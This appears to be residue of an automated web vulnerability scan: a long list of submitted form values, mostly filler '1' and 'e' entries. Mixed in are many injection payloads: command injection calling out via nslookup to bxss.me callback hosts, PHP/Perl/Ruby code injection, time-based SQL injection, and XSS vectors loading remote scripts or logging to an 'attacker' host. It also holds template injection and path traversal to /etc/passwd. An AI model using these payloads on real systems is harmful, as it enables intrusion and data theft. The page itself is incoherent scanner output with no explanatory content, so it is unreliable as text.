(nslookup hitlrygnoxuqtb033e.bxss.me||perl -e "gethostbyname(\'hitlrygnoxuqtb033e.bxss.me\')")
1
1
1
1
$(nslookup hitflgkjypnip208cf.bxss.me||perl -e "gethostbyname(\'hitflgkjypnip208cf.bxss.me\')")
&(nslookup hitcgybqpuocb9cd04.bxss.me||perl -e "gethostbyname(\'hitcgybqpuocb9cd04.bxss.me\')")&\'\\"`0&(nslookup hitcgybqpuocb9cd04.bxss.me||perl -e "gethostbyname(\'hitcgybqpuocb9cd04.bxss.me\')")&`\'
1
${9999768+9999321}
1
|(nslookup hitzgbkprrndvab1de.bxss.me||perl -e "gethostbyname(\'hitzgbkprrndvab1de.bxss.me\')")
1
`(nslookup hitniobaoqstb70c89.bxss.me||perl -e "gethostbyname(\'hitniobaoqstb70c89.bxss.me\')")`
1
1
1
1
1
;(nslookup hitfduarppbde00493.bxss.me||perl -e "gethostbyname(\'hitfduarppbde00493.bxss.me\')")|(nslookup hitfduarppbde00493.bxss.me||perl -e "gethostbyname(\'hitfduarppbde00493.bxss.me\')")&(nslookup hitfduarppbde00493.bxss.me||perl -e "gethostbyname(\'hitfduarppbde00493.bxss.me\')")
1
1
1
)
1
!(()&&!|*|*|
\'.gethostbyname(lc(\'hitfl\'.\'ddlpbhnxb7191.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(116).chr(69).chr(100).chr(71).\'
^(#$!@#$)(()))******
1
1
".gethostbyname(lc("hitud"."izolltfra4f2c.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(85).chr(121).chr(85)."
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1
1
1some_inexistent_file_with_long_name\0.jpg
1
1
1
Http://bxss.me/t/fit.txt
1
1
1
http://bxss.me/t/fit.txt?.jpg
1
1
bxss.me
1
1
1
1
1
1
1
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
bxss.me/t/xss.html?%00
1
1
1
"+"A".concat(70-3).concat(22*4).concat(117).concat(79).concat(113).concat(65)+(require"socket"\nSocket.gethostbyname("hitsu"+"hyeohnezda221.bxss.me.")[3].to_s)+"
1
1
\'+\'A\'.concat(70-3).concat(22*4).concat(120).concat(80).concat(111).concat(89)+(require\'socket\'\nSocket.gethostbyname(\'hitmp\'+\'zzrsufipf93f4.bxss.me.\')[3].to_s)+\'
1
1
;assert(base64_decode(\'cHJpbnQobWQ1KDMxMzM3KSk7\'));
1
index.php
1
\';print(md5(31337));$a=\'
1
1
index.php
1
1
";print(md5(31337));$a="
1
index.php/.
1
${@print(md5(31337))}
1
1
1
1
${@print(md5(31337))}\\
1
1
1
\'.print(md5(31337)).\'
1
1
1
\'"
<!--
1
1
1
1
1
1
1
1
1
1
1
1
1
1
/xfs.bxss.me
1
1
971989
1
http://xfs.bxss.me
1
1
//xfs.bxss.me
1
1
/\\xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+577-577-1=0+0+0+1 --
-1 OR 3+577-577-1=0+0+0+1 --
1\'"()&%<acx><ScRiPt >DaHZ(9042)</ScRiPt>
-1 OR 2+130-130-1=0+0+0+1
\'"()&%<acx><ScRiPt >DaHZ(9021)</ScRiPt>
-1 OR 3+130-130-1=0+0+0+1
19448188
-1\' OR 2+832-832-1=0+0+0+1 --
<%={{={@{#{${acx}}%>
-1\' OR 3+832-832-1=0+0+0+1 --
<th:t="${acx}#foreach
-1\' OR 2+349-349-1=0+0+0+1 or \'hFvgIh8D\'=\'
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
-1\' OR 3+349-349-1=0+0+0+1 or \'hFvgIh8D\'=\'
acx{{98991*97996}}xca
-1\' OR 3*2<(0+5+349-349) or \'hFvgIh8D\'=\'
acx[[${98991*97996}]]xca
-1" OR 2+846-846-1=0+0+0+1 --
acx__${98991*97996}__::.x
-1" OR 3+846-846-1=0+0+0+1 --
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
if(now()=sysdate(),sleep(15),0)
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
1
1
(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
-1; waitfor delay \'0:0:15\' --
-1); waitfor delay \'0:0:15\' --
1 waitfor delay \'0:0:15\' --
Bj50khbN\'; waitfor delay \'0:0:15\' --
-5 OR 115=(SELECT 115 FROM PG_SLEEP(15))--
-5) OR 838=(SELECT 838 FROM PG_SLEEP(15))--
-1)) OR 830=(SELECT 830 FROM PG_SLEEP(15))--
P06yxcQI\' OR 792=(SELECT 792 FROM PG_SLEEP(15))--
zspshSBZ\') OR 264=(SELECT 264 FROM PG_SLEEP(15))--
fvC5dQYv\')) OR 510=(SELECT 510 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
1\'"
@@eZUZQ
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
e
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+970-970-1=0+0+0+1 --
-1 OR 3+970-970-1=0+0+0+1 --
-1 OR 2+265-265-1=0+0+0+1
-1 OR 3+265-265-1=0+0+0+1
-1\' OR 2+616-616-1=0+0+0+1 --
-1\' OR 3+616-616-1=0+0+0+1 --
-1\' OR 2+291-291-1=0+0+0+1 or \'hjgx91fM\'=\'
-1\' OR 3+291-291-1=0+0+0+1 or \'hjgx91fM\'=\'
-1" OR 2+283-283-1=0+0+0+1 --
-1" OR 3+283-283-1=0+0+0+1 --
1
1
response.write(9969863*9541634)
\'+response.write(9969863*9541634)+\'
1<esi:include src="http://bxss.me/rpb.png"/>
"+response.write(9969863*9541634)+"
1
1
if(now()=sysdate(),sleep(15),0)
1
1
1
${9999312+9999920}
1
1
../../../../../../../../../../../../../../etc/passwd
1
../../../../../../../../../../../../../../windows/win.ini
1
1
1
../1
1
1
1
1
1
0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
1
1
1
1
1
1
1
1
1
1
1
1
\'.gethostbyname(lc(\'hitpg\'.\'pxkeeesn7c099.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(102).chr(78).chr(113).chr(85).\'
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
HttP://bxss.me/t/xss.html?%00
1
".gethostbyname(lc("hitzo"."uhtqkmzh7107c.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(67).chr(116).chr(73)."
echo erypnr$()\\ zmjixa\\nz^xyu||a #\' &echo erypnr$()\\ zmjixa\\nz^xyu||a #|" &echo erypnr$()\\ zmjixa\\nz^xyu||a #
)
bxss.me/t/xss.html?%00
&echo ttokqi$()\\ zliixs\\nz^xyu||a #\' &echo ttokqi$()\\ zliixs\\nz^xyu||a #|" &echo ttokqi$()\\ zliixs\\nz^xyu||a #
!(()&&!|*|*|
1
^(#$!@#$)(()))******
|echo mujsal$()\\ avzanr\\nz^xyu||a #\' |echo mujsal$()\\ avzanr\\nz^xyu||a #|" |echo mujsal$()\\ avzanr\\nz^xyu||a #
1
(nslookup hitsamotdhhsg53309.bxss.me||perl -e "gethostbyname(\'hitsamotdhhsg53309.bxss.me\')")
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
$(nslookup hitzowjrjgfve86a4e.bxss.me||perl -e "gethostbyname(\'hitzowjrjgfve86a4e.bxss.me\')")
1
&(nslookup hitoxfqiqrxxcedc21.bxss.me||perl -e "gethostbyname(\'hitoxfqiqrxxcedc21.bxss.me\')")&\'\\"`0&(nslookup hitoxfqiqrxxcedc21.bxss.me||perl -e "gethostbyname(\'hitoxfqiqrxxcedc21.bxss.me\')")&`\'
1some_inexistent_file_with_long_name\0.jpg
1
1
1
1
|(nslookup hitbdaguhmphfb8f2e.bxss.me||perl -e "gethostbyname(\'hitbdaguhmphfb8f2e.bxss.me\')")
1
Http://bxss.me/t/fit.txt
1
1
1
`(nslookup hitvsuswvgcwr52e92.bxss.me||perl -e "gethostbyname(\'hitvsuswvgcwr52e92.bxss.me\')")`
1
(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'"+(select(0)from(select(sleep(15)))v)+"*/
http://bxss.me/t/fit.txt?.jpg
1
;(nslookup hitdnffvhrtndff0c0.bxss.me||perl -e "gethostbyname(\'hitdnffvhrtndff0c0.bxss.me\')")|(nslookup hitdnffvhrtndff0c0.bxss.me||perl -e "gethostbyname(\'hitdnffvhrtndff0c0.bxss.me\')")&(nslookup hitdnffvhrtndff0c0.bxss.me||perl -e "gethostbyname(\'hitdnffvhrtndff0c0.bxss.me\')")
1
bxss.me
1
1
1
1
1
1
1
1
;assert(base64_decode(\'cHJpbnQobWQ1KDMxMzM3KSk7\'));
1
"+"A".concat(70-3).concat(22*4).concat(110).concat(86).concat(111).concat(77)+(require"socket"\nSocket.gethostbyname("hitpg"+"fshinqidd3687.bxss.me.")[3].to_s)+"
\'+\'A\'.concat(70-3).concat(22*4).concat(111).concat(67).concat(107).concat(71)+(require\'socket\'\nSocket.gethostbyname(\'hithw\'+\'uqjymavgb4f0b.bxss.me.\')[3].to_s)+\'
\';print(md5(31337));$a=\'
-1; waitfor delay \'0:0:15\' --
1
1
";print(md5(31337));$a="
1
1
${@print(md5(31337))}
1
1
${@print(md5(31337))}\\
1
1
1
index.php
1
1
1
1
\'.print(md5(31337)).\'
1
index.php
1
1
1
1
1
index.php/.
1
1
1
1
1
1
1
1
1
1
-1); waitfor delay \'0:0:15\' --
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
/xfs.bxss.me
1
\'"
974813
1
<!--
1
http://xfs.bxss.me
1
1
//xfs.bxss.me
1
1
1
1 waitfor delay \'0:0:15\' --
1
/\\xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
nO67xk4U\'; waitfor delay \'0:0:15\' --
1
1
1
1
-5 OR 733=(SELECT 733 FROM PG_SLEEP(15))--
-5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--
-1)) OR 40=(SELECT 40 FROM PG_SLEEP(15))--
1
IAJIkTTv\' OR 489=(SELECT 489 FROM PG_SLEEP(15))--
Ny6WF1Oh\') OR 837=(SELECT 837 FROM PG_SLEEP(15))--
EVTybEbx\')) OR 726=(SELECT 726 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1\'"()&%<acx><ScRiPt >osdn(9705)</ScRiPt>
1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
\'"()&%<acx><ScRiPt >osdn(9594)</ScRiPt>
1\'"
19906459
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
@@EXEwd
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
1
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1kq0IR76O
1
e
1
e
1
e
1
e
e
e
e
e
e
response.write(9043445*9784943)
\'+response.write(9043445*9784943)+\'
"+response.write(9043445*9784943)+"
e
e
e
e
e
e
e
e
e
e
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
echo ayaewx$()\\ coedsu\\nz^xyu||a #\' &echo ayaewx$()\\ coedsu\\nz^xyu||a #|" &echo ayaewx$()\\ coedsu\\nz^xyu||a #
e
&echo vpxwfw$()\\ cuzpsu\\nz^xyu||a #\' &echo vpxwfw$()\\ cuzpsu\\nz^xyu||a #|" &echo vpxwfw$()\\ cuzpsu\\nz^xyu||a #
e<esi:include src="http://bxss.me/rpb.png"/>
../e
|echo ksqgwf$()\\ bamehu\\nz^xyu||a #\' |echo ksqgwf$()\\ bamehu\\nz^xyu||a #|" |echo ksqgwf$()\\ bamehu\\nz^xyu||a #
(nslookup hittxutevohrr91308.bxss.me||perl -e "gethostbyname(\'hittxutevohrr91308.bxss.me\')")
e
${9999295+9999427}
$(nslookup hitvsutskxyjb561b2.bxss.me||perl -e "gethostbyname(\'hitvsutskxyjb561b2.bxss.me\')")
e
e
&(nslookup hitfomnjyapdb85950.bxss.me||perl -e "gethostbyname(\'hitfomnjyapdb85950.bxss.me\')")&\'\\"`0&(nslookup hitfomnjyapdb85950.bxss.me||perl -e "gethostbyname(\'hitfomnjyapdb85950.bxss.me\')")&`\'
e
e
|(nslookup hitflthwgozop971b5.bxss.me||perl -e "gethostbyname(\'hitflthwgozop971b5.bxss.me\')")
e
e
e
`(nslookup hitbzlkejddci3434f.bxss.me||perl -e "gethostbyname(\'hitbzlkejddci3434f.bxss.me\')")`
e
;(nslookup hitcnntafdbwj65e5f.bxss.me||perl -e "gethostbyname(\'hitcnntafdbwj65e5f.bxss.me\')")|(nslookup hitcnntafdbwj65e5f.bxss.me||perl -e "gethostbyname(\'hitcnntafdbwj65e5f.bxss.me\')")&(nslookup hitcnntafdbwj65e5f.bxss.me||perl -e "gethostbyname(\'hitcnntafdbwj65e5f.bxss.me\')")
e
e
e
e
e
e
e
e
e
e
e
\'.gethostbyname(lc(\'hitqq\'.\'qxzezmrf40e52.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(122).chr(67).chr(107).chr(67).\'
e
".gethostbyname(lc("hitlu"."alqdddou0fdea.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(83).chr(99).chr(81)."
)
e
e
!(()&&!|*|*|
e
^(#$!@#$)(()))******
e
e
e
e
e
e
e
e
e
e
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
e
e
e
e
e
1some_inexistent_file_with_long_name\0.jpg
e
e
e
Http://bxss.me/t/fit.txt
e
e
e
http://bxss.me/t/fit.txt?.jpg
e
;assert(base64_decode(\'cHJpbnQobWQ1KDMxMzM3KSk7\'));
e
\';print(md5(31337));$a=\'
e
bxss.me
";print(md5(31337));$a="
e
e
e
${@print(md5(31337))}
e
e
${@print(md5(31337))}\\
e
e
\'.print(md5(31337)).\'
e
HttP://bxss.me/t/xss.html?%00
e
e
bxss.me/t/xss.html?%00
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
-1 OR 2+267-267-1=0+0+0+1 --
e
e
e
-1 OR 3+267-267-1=0+0+0+1 --
e
-1 OR 2+270-270-1=0+0+0+1
e
e
-1 OR 3+270-270-1=0+0+0+1
e
-1\' OR 2+846-846-1=0+0+0+1 --
e
-1\' OR 3+846-846-1=0+0+0+1 --
e
e
e
e
-1\' OR 2+426-426-1=0+0+0+1 or \'V0JxUoa7\'=\'
e
e
e
-1\' OR 3+426-426-1=0+0+0+1 or \'V0JxUoa7\'=\'
e
-1" OR 2+267-267-1=0+0+0+1 --
e
e
-1" OR 3+267-267-1=0+0+0+1 --
e
if(now()=sysdate(),sleep(15),0)
e
0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
e
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'"+(select(0)from(select(sleep(15)))v)+"*/
1 waitfor delay \'0:0:15\' --
djNmEEU0\'; waitfor delay \'0:0:15\' --
VGFRgUqh\' OR 920=(SELECT 920 FROM PG_SLEEP(15))--
d52580kN\') OR 178=(SELECT 178 FROM PG_SLEEP(15))--
233QxPda\')) OR 724=(SELECT 724 FROM PG_SLEEP(15))--
e\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
1\'"
@@Ls8af
e
e
"+"A".concat(70-3).concat(22*4).concat(110).concat(70).concat(114).concat(76)+(require"socket"\nSocket.gethostbyname("hitdk"+"iyjyxqrlf0b66.bxss.me.")[3].to_s)+"
\'+\'A\'.concat(70-3).concat(22*4).concat(106).concat(80).concat(116).concat(89)+(require\'socket\'\nSocket.gethostbyname(\'hitca\'+\'lfgsqctwa36fb.bxss.me.\')[3].to_s)+\'
e
e
e
index.php
e
\'"
index.php
e
index.php/.
<!--
e
e
e
e
e
e
e
e
e
e
e
/xfs.bxss.me
943164
e
e
http://xfs.bxss.me
e
e
//xfs.bxss.me
/\\xfs.bxss.me
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
1
e
1
1
e
1
e
1
e
e
1
e
e
e
e
e
e
e
e
1
e
1
e
e
e
e
e
1
e
1
e\'"()&%<acx><ScRiPt >ED0b(9329)</ScRiPt>
\'"()&%<acx><ScRiPt >ED0b(9385)</ScRiPt>
e
1
e9657624
<%={{={@{#{${acx}}%>
1
e
<th:t="${acx}#foreach
1
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
e
acx{{98991*97996}}xca
1
1
1
e
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
e
1
<%={{={@{#{${acx}}%>
1
1
<th:t="${acx}#foreach
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
1
1
e
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
1
e
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
e
1
e
e
1
e
1
e
1
e
1
1
1
1
1
1
1
1
1
e
1
1
1
1
1
e
1
e
1
1
e
e
e
1
1
1
1
1
1
1
1
1
1
1
e\'"()&%<acx><ScRiPt >1oKO(9513)</ScRiPt>
e
\'"()&%<acx><ScRiPt >1oKO(9203)</ScRiPt>
e
e
e9199882
acu3461<s1﹥s2ʺs3ʹuca3461
e
e
e
<%={{={@{#{${acx}}%>
e
e
e
<th:t="${acx}#foreach
e
e
e
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
e
e
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
e
e
acx__${98991*97996}__::.x
e
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
e
e<ScRiPt >1oKO(9016)</ScRiPt>
e
e<WWTFK6>THSJO[!+!]</WWTFK6>
e
e
e<script>1oKO(9539)</script>
e
e<ScR<ScRiPt>IpT>1oKO(9167)</sCr<ScRiPt>IpT>
e
e
e<ScRiPt \r\n>1oKO(9967)</ScRiPt>
e
e
e
e<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9824></ScRiPt>
e
e<\0ScRiPt \r\n>1oKO(9766)</ScRiPt>
e
e
e
e
e
e<isindex type=image src=1 onerror=1oKO(9778)>
e<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9592\'>
e
e
e<body onload=1oKO(9671)>
e
e
e<img src=//xss.bxss.me/t/dot.gif onload=1oKO(9176)>
e
e
e<img src=xyz OnErRor=1oKO(9886)>
e<img/src=">" onerror=alert(9725)>
%65%3C%53%63%52%69%50%74%20%3E%31%6F%4B%4F%289352%29%3C%2F%73%43%72%69%70%54%3E
e
e\\u003CScRiPt\\1oKO(9966)\\u003C/sCripT\\u003E
e
e
e<ScRiPt>1oKO(9162)</sCripT>
e
e
e
e<input autofocus onfocus=1oKO(9236)>
e
e
<a HrEF=http://xss.bxss.me></a>
e
<a HrEF=jaVaScRiPT:>
e
e}body{acu:Expre/**/SSion(1oKO(9509))}
e
e<% contenteditable onresize=1oKO(9730)>
e
e
eBCODZ\n<ScRiPt >1oKO(9567)</ScRiPt>
e
e<WMNEHB>OGVSP[!+!]</WMNEHB>
e
e
e
e<ifRAme sRc=9917.com></IfRamE>
e
e<c7zwpK x=9888>
e
e<img sRc=\'http://attacker-9258/log.php?
e
e
e<ewtHAr<
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e\'"()&%<acx><ScRiPt >Q0wN(9402)</ScRiPt>
\'"()&%<acx><ScRiPt >Q0wN(9195)</ScRiPt>
e9996618
acu3552<s1﹥s2ʺs3ʹuca3552
<%={{={@{#{${acx}}%>
e
<th:t="${acx}#foreach
e
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
e
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
e<ScRiPt >Q0wN(9532)</ScRiPt>
e<WVCPL8>NLJP4[!+!]</WVCPL8>
e<script>Q0wN(9751)</script>
e<ScR<ScRiPt>IpT>Q0wN(9711)</sCr<ScRiPt>IpT>
e<ScRiPt \r\n>Q0wN(9325)</ScRiPt>
e<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9015></ScRiPt>
e<\0ScRiPt \r\n>Q0wN(9751)</ScRiPt>
e<isindex type=image src=1 onerror=Q0wN(9458)>
e<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9374\'>
e<body onload=Q0wN(9316)>
e<img src=//xss.bxss.me/t/dot.gif onload=Q0wN(9847)>
e<img src=xyz OnErRor=Q0wN(9168)>
e<img/src=">" onerror=alert(9235)>
%65%3C%53%63%52%69%50%74%20%3E%51%30%77%4E%289328%29%3C%2F%73%43%72%69%70%54%3E
e\\u003CScRiPt\\Q0wN(9456)\\u003C/sCripT\\u003E
e<ScRiPt>Q0wN(9155)</sCripT>
e<input autofocus onfocus=Q0wN(9046)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
e}body{acu:Expre/**/SSion(Q0wN(9703))}
e<% contenteditable onresize=Q0wN(9956)>
ewOX4R\n<ScRiPt >Q0wN(9254)</ScRiPt>
e<WO2LT6>1GUNW[!+!]</WO2LT6>
e<ifRAme sRc=9864.com></IfRamE>
e<j0zv4z x=9039>
e<img sRc=\'http://attacker-9524/log.php?
e<X1j1F0<
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
e
اضف تعليق